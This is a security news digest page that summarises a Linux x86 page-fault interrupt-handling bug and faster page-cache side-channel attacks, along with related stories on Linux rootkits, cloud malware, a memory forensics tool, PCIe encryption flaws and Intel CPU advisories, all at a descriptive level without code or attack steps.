Linux Kernel Research Highlights x86 Page-Fault Interrupt Handling Bug and Faster Page-Cache Side-Channel Attacks
Linux kernel security reporting highlighted two separate Linux-focused issues: a long-standing x86 page-fault handling logic flaw and newly optimized page-cache side-channel techniques. An Intel engineer (Cedric Xing) identified that, since 2020, parts of the x86 do_page_fault() path could leave hardware interrupts enabled in situations where the kernel’s logic assumed they were disabled, due to conflating address range (user vs. kernel) with execution context; a fix was merged into Linux 6.19 with plans to backport to stable branches.
Separately, researchers from Graz University of Technology described significantly faster Linux page cache attacks, reducing cache-flush time from ~149 ms to ~0.8 µs and enabling tighter attack loops (0.6–2.3 µs). The work describes potential impacts including more precise overlay/keylogging-style attacks, inter-keystroke timing inference, container/Docker file-activity insights, and user-activity inference in applications such as Discord and Firefox; reporting noted that only CVE-2025-21691 has been remediated by the Linux kernel security team. A third item—Imagination Technologies’ GPU driver vulnerability bulletin—covers unrelated GPU DDK issues (information leak and UAF-class bugs) and does not pertain to the Linux kernel x86/page-cache topics.
Related Entities
Sources
Related Stories
Linux Cloud Threats: eBPF/io_uring Rootkits and VoidLink Malware Targeting Containers
Security research highlighted a continued shift in attacker tradecraft toward **Linux cloud and container environments**, with stealth-focused malware increasingly abusing modern kernel capabilities. Elastic Security Labs documented the evolution of Linux rootkits from userland hijacking and LKM implants to newer generations that leverage **eBPF** and **io_uring** for stealth and evasion, citing examples including **TripleCross**, **Boopkit**, and **RingReaper**. Separately, reporting on **VoidLink** described a cloud-native malware framework designed to operate inside Linux workloads, detect whether it is running in major cloud providers and in **Docker/Kubernetes**, and adapt its behavior to remain persistent while harvesting sensitive material such as cloud metadata and credentials. Operationally, the same kernel features and observability gaps being leveraged by attackers are also driving defensive tooling improvements. Trail of Bits released *mquire*, an open-source Linux memory forensics tool intended to reduce dependency on external debug symbols by extracting structure and symbol information directly from memory using **BPF Type Format (BTF)** and **Kallsyms** (e.g., `/proc/kallsyms`-style data), then exposing findings through an interactive **SQL** query interface. While *mquire* is not tied to a single named campaign, it is directly relevant to investigating advanced Linux threats (including kernel-level implants and stealthy cloud malware) by enabling more reliable post-compromise analysis of Linux memory dumps across kernel versions.
1 weeks agoLinux Kernel Adds PCIe Link Encryption Amid Disclosure of PCIe IDE Vulnerabilities
The Linux kernel is introducing support for PCI Express (PCIe) Link Encryption in version 6.19, a feature developed collaboratively by Intel, AMD, and Arm to enhance the security of cloud server infrastructure. This new capability leverages certificates and keys to encrypt data transmitted between CPUs and hardware components over PCIe, aiming to prevent unauthorized devices from intercepting sensitive information. The encryption protocol, known as Integrity and Data Encryption (IDE), is managed through a Trusted Execution Environment (TEE) Security Manager, providing an additional layer of protection for cloud providers against hardware-based attacks. Concurrently, three significant vulnerabilities have been disclosed in the PCIe IDE protocol, affecting PCIe Base Specification Revision 5.0 and later. These flaws—CVE-2025-9612, CVE-2025-9613, and CVE-2025-9614—could allow local attackers to reorder traffic, redirect completion timeouts, or inject stale data, potentially leading to information disclosure, privilege escalation, or denial of service. While these vulnerabilities require physical or low-level access to exploit, they highlight the ongoing challenges in securing PCIe communications, even as new encryption features are being integrated into major operating systems like Linux.
3 months ago
Intel CPU Vulnerability CVE-2025-20109 Advisory and Downstream Vendor Impact
**Intel** published security advisories on March 10, 2026 covering vulnerabilities across multiple products, prompting the Canadian Centre for Cyber Security to recommend reviewing Intel’s guidance and applying mitigations and updates. In parallel, **F5** issued a product security advisory for **CVE-2025-20109**, an **Intel CPU vulnerability**, indicating potential downstream impact to vendors whose appliances or platforms rely on affected Intel processors. Separate from the Intel CPU issue, the Canadian Centre for Cyber Security also relayed routine upstream patch activity from **Ubuntu** and **Red Hat** between March 2–8, 2026, including **Linux kernel** security updates across multiple supported releases and platforms. These Linux distribution advisories are not specific to CVE-2025-20109 and should be tracked as independent patching items for organizations running affected Ubuntu LTS versions and Red Hat Enterprise Linux variants.
6 days ago